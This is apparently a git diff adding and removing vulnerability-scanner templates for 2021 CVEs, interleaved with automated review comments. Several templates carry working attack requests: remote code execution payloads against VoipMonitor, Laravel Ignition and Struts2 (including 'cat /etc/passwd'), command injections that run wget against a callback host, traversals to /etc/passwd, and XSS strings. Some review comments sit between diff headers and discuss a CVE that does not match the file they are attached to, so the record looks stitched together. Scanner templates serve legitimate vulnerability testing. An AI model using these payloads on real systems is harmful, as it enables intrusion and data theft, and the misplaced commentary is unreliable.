+ words:
+ - "Apache Server Status"
+ - "Server Version"
+ condition: and
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+# Enhanced by mp on 2022/05/17
diff --git a/poc/cve/cve-2021-29490-6011.yaml b/poc/cve/cve-2021-29490-6011.yaml
new file mode 100644
index 0000000000..b9b3a7d41b
--- /dev/null
+++ b/poc/cve/cve-2021-29490-6011.yaml
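Review bot: Nothing in the matchers ties a hit to the netmask package: the three paths probe the generic parameter names `url`, `host` and `file`, and `matchers-condition: or` with no status matcher fires on any response that contains the Apache status strings or a passwd-style line. A match therefore shows that some parameter fetched or read a local resource, and labelling it CVE-2021-28918 at `severity: critical` can send triage to the wrong component. I would state this in the template, e.g. `# heuristic: a match indicates SSRF/LFI on a generic parameter; confirm that netmask is in use before attributing to this CVE`, and add `part: body` to the regex matcher so it agrees with the word matcher.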
@@ -0,0 +1,28 @@
+id: CVE-2021-29490
+info:
+ name: Jellyfin 10.7.2 SSRF
+ author: alph4byt3
+ severity: medium
+ description: Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-29490
+ - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
+ cvss-score: 5.8
+ cve-id: CVE-2021-29490
+ cwe-id: CWE-918
+ remediation: Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints "/Items/*/RemoteImages/Download", "/Items/RemoteSearch/Image" and "/Images/Remote".
+ tags: cve,cve2021,ssrf,jellyfin
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/Images/Remote?imageUrl=http://{{interactsh-url}}"
+ - "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=http://{{interactsh-url}}&ProviderName=TheMovieDB"
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
+
+# Enhanced by cs on 2022/02/25
diff --git a/poc/cve/cve-2021-29622.yaml b/poc/cve/cve-2021-29622.yaml
deleted file mode 100644
index 2c7ddc4b80..0000000000
--- a/poc/cve/cve-2021-29622.yaml
+++ /dev/null
@@ -1,38 +0,0 @@ -id: CVE-2021-29622 - -info: - name: Prometheus - Open Redirect - author: geeknik - severity: medium - description: Prometheus 2.23.0 through 2.26.0 and 2.27.0 contains an open redirect vulnerability. To ensure a seamless transition to 2.27.0, the default UI was changed to the new UI with a URL prefixed by /new redirect to /. Due to a bug in the code, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - remediation: The issue was patched in the 2.26.1 and 2.27.1 releases. In 2.28.0, the /new endpoint will be removed completely. The workaround is to disable access to /new via a reverse proxy in front of Prometheus. - reference: - - https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7 - - https://github.com/prometheus/prometheus/releases/tag/v2.26.1 - - https://github.com/prometheus/prometheus/releases/tag/v2.27.1 - - https://nvd.nist.gov/vuln/detail/CVE-2021-29622 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-29622 - cwe-id: CWE-601 - epss-score: 0.00225 - epss-percentile: 0.60673 - cpe: cpe:2.3:a:prometheus:prometheus:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: prometheus - product: prometheus - tags: cve,cve2021,prometheus,redirect - -http: - - method: GET - path: - - "{{BaseURL}}/new/newhttp://interact.sh" - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100d75f4c5133606b067f8cabdb444b368dbf5da4507c4fae4e6cca9f7d2ba05b76022100d8a2030d157148b3638b0070fd6d6e8a3a38484d4666f0497a069ca8d47435ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2021-30461.yaml b/poc/cve/cve-2021-30461.yaml new file mode 100644 index 0000000000..c7a522674d --- /dev/null +++ b/poc/cve/cve-2021-30461.yaml 
@@ -0,0 +1,38 @@
+id: CVE-2021-30461
+
+info:
+ name: VoipMonitor Pre-Auth-RCE
+ author: shifacyclewala,hackergautam
+ severity: critical
+ description: A malicious actor can trigger Un authenticated Remote Code Execution using CVE-2021-30461.
+ tags: cve,cve2021,rce,voipmonitor
+ reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/
+
+requests:
+ - raw:
+ - |
+ POST /index.php HTTP/1.1
+ Host: {{Hostname}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Connection: close
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 35
+
+ SPOOLDIR=test".system(id)."&recheck=Recheck
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "uid="
+ - "gid="
+ - "groups="
+ - "VoIPmonitor installation"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2021-31249-6068.yaml b/poc/cve/cve-2021-31249-6068.yaml
deleted file mode 100644
index 6dd6e07053..0000000000
--- a/poc/cve/cve-2021-31249-6068.yaml
+++ /dev/null
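Review bot: The request body makes the target run a command, yet the `tags:` line gives operators nothing to filter on when a scan has to stay non-invasive; I would mark it explicitly, `tags: cve,cve2021,rce,voipmonitor,intrusive`, so it can be excluded by tag on production scopes. The `info:` block also has no `classification:` section (the other critical templates in this commit carry `cvss-metrics`, `cvss-score` and `cwe-id`), and `reference:` is a bare string where the siblings use a list. The description reads `Un authenticated`; `unauthenticated` is meant.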
@@ -1,23 +0,0 @@ -id: CVE-2021-31249 -info: - name: CHIYU TCP/IP Converter devices - CRLF injection - author: geeknik - description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter 'redirect' available on multiple CGI components. - reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249 - severity: medium - tags: cve,cve2021,chiyu,crlf,iot -requests: - - method: GET - path: - - "{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY" - matchers-condition: and - matchers: - - type: status - status: - - 302 - - type: word - part: header - words: - - "Location: setting.htm" - - "" - condition: and diff --git a/poc/cve/cve-2021-3129.yaml b/poc/cve/cve-2021-3129.yaml deleted file mode 100644 index 519231a58e..0000000000 --- a/poc/cve/cve-2021-3129.yaml +++ /dev/null 
@@ -1,94 +0,0 @@ -id: CVE-2021-3129 - -info: - name: Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution - author: z3bd,pdteam - severity: critical - description: Laravel version 8.4.2 and before with Ignition before 2.5.2 allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2. - remediation: | - Upgrade Laravel to version 8.4.3 or higher to mitigate this vulnerability. - reference: - - https://www.ambionics.io/blog/laravel-debug-rce - - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129 - - https://nvd.nist.gov/vuln/detail/CVE-2021-3129 - - https://github.com/facade/ignition/pull/334 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-3129 - epss-score: 0.97488 - epss-percentile: 0.9997 - cpe: cpe:2.3:a:facade:ignition:*:*:*:*:*:laravel:*:* - metadata: - max-request: 6 - vendor: facade - product: ignition - framework: laravel - tags: cve,cve2021,laravel,rce,vulhub,kev - -http: - - raw: - - | - POST /_ignition/execute-solution HTTP/1.1 - Host: {{Hostname}} - Accept: application/json - Content-Type: application/json - - {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}} - - | - POST /_ignition/execute-solution HTTP/1.1 - Host: {{Hostname}} - Accept: application/json - Content-Type: application/json - - {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": 
"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}} - - | - POST /_ignition/execute-solution HTTP/1.1 - Host: {{Hostname}} - Accept: application/json - Content-Type: application/json - - {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "AA"}} - - | - POST /_ignition/execute-solution HTTP/1.1 - Host: {{Hostname}} - Accept: application/json - Content-Type: application/json - - {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00
=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"}} - - | - POST /_ignition/execute-solution HTTP/1.1 - Host: {{Hostname}} - Accept: application/json - Content-Type: application/json - - {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}} - - | - POST /_ignition/execute-solution HTTP/1.1 - Host: {{Hostname}} - Accept: application/json - Content-Type: application/json - - {"solution": 
"Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt"}} - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "uid=" - - "gid=" - - "groups=" - - "Illuminate" - condition: and - - - type: status - status: - - 500 - - extractors: - - type: regex - regex: - - "(u|g)id=.*" - -# digest: 4a0a00473045022100c6308e8a385d5456d3d4a6c9ff4fba41345787cf5f95d5a9b0641ef5293d07d50220324074ccb7a80ecc48ad853af5db9aa00f3d35ff61823430822705c3a9063c53:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/cve-2021-31589-6095.yaml b/poc/cve/cve-2021-31589-6095.yaml new file mode 100644 index 0000000000..1be8932582 --- /dev/null +++ b/poc/cve/cve-2021-31589-6095.yaml 
@@ -0,0 +1,35 @@
+id: CVE-2021-31589
+info:
+ name: BeyondTrust Remote Support Reflected XSS
+ author: Ahmed Abou-Ela
+ severity: medium
+ description: Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2021-31589
+ cwe-id: CWE-79
+ metadata:
+ shodan-query: 'set-cookie: nsbase_session'
+ google-dork: '"BeyondTrust" "Redistribution Prohibited"'
+ reference:
+ - https://packetstormsecurity.com/files/165408
+ - https://cxsecurity.com/issue/WLB-2022010013
+ - https://beyondtrustcorp.service-now.com/csm?sys_kb_id=922d0ab31bc1b490e73854ae034bcb7b&id=kb_article_view&sysparm_rank=1&sysparm_tsqueryId=64fc14ffdb8f70d422725385ca9619cb
+ tags: cve,cve2021,beyondtrust,bomgar,xss
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password"
+ matchers-condition: and
+ matchers:
+ - type: word
+ case-insensitive: true
+ part: body
+ words:
+ - ''
+ - 'bomgar'
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2021-31682-6102.yaml b/poc/cve/cve-2021-31682-6102.yaml
deleted file mode 100644
index 9c2b058981..0000000000
--- a/poc/cve/cve-2021-31682-6102.yaml
+++ /dev/null
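Review bot: This XSS check has no content-type matcher, unlike the WOOF template in the same commit, so a reflection inside a non-HTML response would still be reported even though a browser would not render it. As displayed, the first entry under `words:` is also an empty string `''`, which matches every body and leaves `'bomgar'` plus status 200 as the only real conditions; that would flag any reachable login page whether or not it is patched (the marker may have been lost when this page was rendered, so check the file itself). Adding the header matcher below and confirming the first word is the reflected marker keeps the finding tied to the actual flaw.

```yaml
    # … unchanged: body word matcher and status matcher …
      - type: word
        part: header
        words:
          - text/html
```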
@@ -1,36 +0,0 @@ -id: CVE-2021-31682 -info: - name: WebCTRL OEM - Reflected XSS - author: gy741,dhiyaneshDk - severity: medium - description: The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. This issue impacts versions 6.5 and below. This issue works by passing in a basic XSS payload to a vulnerable GET parameter that is reflected in the output without sanitization. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-31682 - - https://github.com/3ndG4me/WebCTRL-OperatorLocale-Parameter-Reflected-XSS - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-31682 - cwe-id: CWE-79 - tags: cve,cve2021,webctrl,xss - metadata: - shodan-query: 'html:"/_common/lvl5/dologin.jsp"' -requests: - - method: GET - path: - - '{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: body - condition: and - words: - - '">' - - 'common/lvl5' - - type: word - part: header - words: - - "text/html" diff --git a/poc/cve/cve-2021-31805(1).yaml b/poc/cve/cve-2021-31805(1).yaml deleted file mode 100644 index 8b70dbaa8d..0000000000 --- a/poc/cve/cve-2021-31805(1).yaml +++ /dev/null 
@@ -1,48 +0,0 @@ -id: CVE-2021-31805 -info: - name: Apache Struts2 S2-062 - Remote Code Execution - author: taielab - severity: critical - description: Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. - reference: - - https://cwiki.apache.org/confluence/display/WW/S2-062 - - https://github.com/Axx8/Struts2_S2-062_CVE-2021-31805 - - https://nvd.nist.gov/vuln/detail/CVE-2021-31805 - remediation: Avoid using forced OGNL evaluation on untrusted user input, and/or upgrade to Struts 2.5.30 or greater which checks if expression evaluation won't lead to the double evaluation. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-31805 - cwe-id: CWE-917 - tags: cve,cve2021,apache,rce,struts,struts2 -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF - Content-Length: 1095 - - ------WebKitFormBoundaryl7d1B1aGsV2wcZwF - Content-Disposition: form-data; name="id" - - %{ - (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + - (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) + - (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + - (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) + - (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + - (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) + - (#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + - 
(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + - (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'})) - } - - ------WebKitFormBoundaryl7d1B1aGsV2wcZwF— - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - -# Enhanced by mp on 2022/04/21 diff --git a/poc/cve/cve-2021-3223(1).yaml b/poc/cve/cve-2021-3223(1).yaml deleted file mode 100644 index 8507a7009f..0000000000 --- a/poc/cve/cve-2021-3223(1).yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2021-3223 -info: - name: Node RED Dashboard - Directory Traversal - author: gy741,pikpikcu - severity: high - description: Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files. - reference: - - https://github.com/node-red/node-red-dashboard/issues/669 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223 - - https://github.com/node-red/node-red-dashboard/releases/tag/2.26.2 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-3223 - cwe-id: CWE-22 - metadata: - verified: true - shodan-query: title:"Node-RED" - fofa-query: title="Node-RED" - tags: cve,cve2021,node-red-dashboard,lfi -requests: - - method: GET - path: - - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd' - - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js' - matchers-condition: or - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - type: word - part: body - words: - - "Node-RED web server is listening" diff --git a/poc/cve/cve-2021-32305-6134.yaml b/poc/cve/cve-2021-32305-6134.yaml new file mode 100644 index 0000000000..5c6c729e5b --- /dev/null +++ b/poc/cve/cve-2021-32305-6134.yaml 
@@ -0,0 +1,31 @@
+id: CVE-2021-32305
+info:
+ name: Websvn <2.6.1 - Remote Code Execution
+ author: gy741
+ severity: critical
+ description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
+ reference:
+ - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html
+ - https://github.com/websvnphp/websvn/pull/142
+ - http://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-32305
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-32305
+ cwe-id: CWE-78
+ tags: cve,cve2021,websvn,rce,oast
+requests:
+ - raw:
+ - |
+ GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
+
+# Enhanced by mp on 2022/05/18
diff --git a/poc/cve/cve-2021-33544-6176.yaml b/poc/cve/cve-2021-33544-6176.yaml
new file mode 100644
index 0000000000..78779b5b28
--- /dev/null
+++ b/poc/cve/cve-2021-33544-6176.yaml
@@ -0,0 +1,23 @@
+id: CVE-2021-33544
+info:
+ name: Geutebruck RCE
+ description: Multiple vulnerabilities in the web-based management interface of Geutebruck could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
+ author: gy741
+ severity: critical
+ reference: |
+ - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/
+ tags: cve,cve2021,geutebruck,rce,oob
+requests:
+ - raw:
+ - |
+ GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1
+ Host: {{Hostname}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Accept-Encoding: gzip, deflate
+ Cache-Control: max-age=0
+ Connection: keep-alive
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/poc/cve/cve-2021-33807-6211.yaml b/poc/cve/cve-2021-33807-6211.yaml
new file mode 100644
index 0000000000..4acf49004b
--- /dev/null
+++ b/poc/cve/cve-2021-33807-6211.yaml
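Review bot: `reference: |` turns the list beneath it into one literal string that starts with `- `, so tooling that expects a list of URLs gets a single malformed entry; dropping the `|` (`reference:` followed by the `- https://…` item) fixes that. The tag `oob` is also inconsistent with the WebSVN template in this commit, which marks the same out-of-band technique as `oast`, so a tag filter on one misses the other. There is no `classification:` block either, which leaves this `severity: critical` entry without the `cvss-metrics`, `cvss-score` and `cwe-id` its siblings carry.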
@@ -0,0 +1,38 @@
+id: CVE-2021-33807
+
+info:
+ name: Cartadis Gespage 8.2.1 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData.
+ reference:
+ - https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807
+ tags: cve,cve2021,lfi,gespage
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2021-33807
+ cwe-id: CWE-22
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log"
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "NetpDoDomainJoin:"
+ part: body
+
+ - type: word
+ words:
+ - "application/octet-stream"
+ part: header
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2021-34370-6221.yaml b/poc/cve/cve-2021-34370-6221.yaml
new file mode 100644
index 0000000000..8973cec47a
--- /dev/null
+++ b/poc/cve/cve-2021-34370-6221.yaml
@@ -0,0 +1,17 @@
+id: CVE-2021-34370
+info:
+ name: Accela Civic Platform 21.1 - Open Redirect & XSS
+ author: 0x_Akoko
+ description: Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1
+ reference: https://www.exploit-db.com/exploits/49990
+ severity: medium
+ tags: xss,redirect,cves
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/"
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ part: header
diff --git a/poc/cve/cve-2021-34643-6238.yaml b/poc/cve/cve-2021-34643-6238.yaml
deleted file mode 100644
index 5a6cd61db5..0000000000
--- a/poc/cve/cve-2021-34643-6238.yaml
+++ /dev/null
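Review bot: In `cve-2021-33807-6211.yaml` the description names two affected endpoints, `gespage/doDownloadData` and `gespage/webapp/doDownloadData`, but `path:` requests only the first, so a host that exposes only the second comes back clean. Either cover both endpoints under `path:` or narrow the description to what is tested, so a negative result is not over-read. The check is also Windows-only: it looks for `NetpDoDomainJoin:` from `NetSetup.log`, which is worth a comment such as `# Windows hosts only; a non-Windows install will not match`.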
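Review bot: In `cve-2021-34370-6221.yaml` the line `tags: xss,redirect,cves` lacks the `cve` and `cve2021` tags every other CVE template in this commit carries, so tag-based selection or reporting on `cve` skips this entry; `tags: cve,cve2021,accela,redirect,xss` would be consistent. The name and description promise an XSS check as well, but the single matcher only inspects the `Location` header for the redirect, so the title should either drop "& XSS" or the template should say that XSS is not tested. There is also no `classification:` block, and `reference:` is a bare string rather than a list.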
@@ -1,42 +0,0 @@ -id: CVE-2021-34643 -info: - name: Skaut bazar < 1.3.3 - Reflected Cross-Site Scripting - author: dhiyaneshDK - severity: medium - description: The Skaut bazar WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.3.2. - reference: - - https://wpscan.com/vulnerability/c1b41276-b8fb-4a5c-bede-84ea62663b7a - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34643 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-34643 - cwe-id: CWE-79 - tags: wordpress,cve,cve2021,wp-plugin,authenticated -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | - GET /wp-admin/options-general.php//?page=skatubazar_option HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - type: status - status: - - 200 - - type: word - part: header - words: - - "text/html" diff --git a/poc/cve/cve-2021-35265-6245.yaml b/poc/cve/cve-2021-35265-6245.yaml deleted file mode 100644 index 013ce549c4..0000000000 --- a/poc/cve/cve-2021-35265-6245.yaml +++ /dev/null 
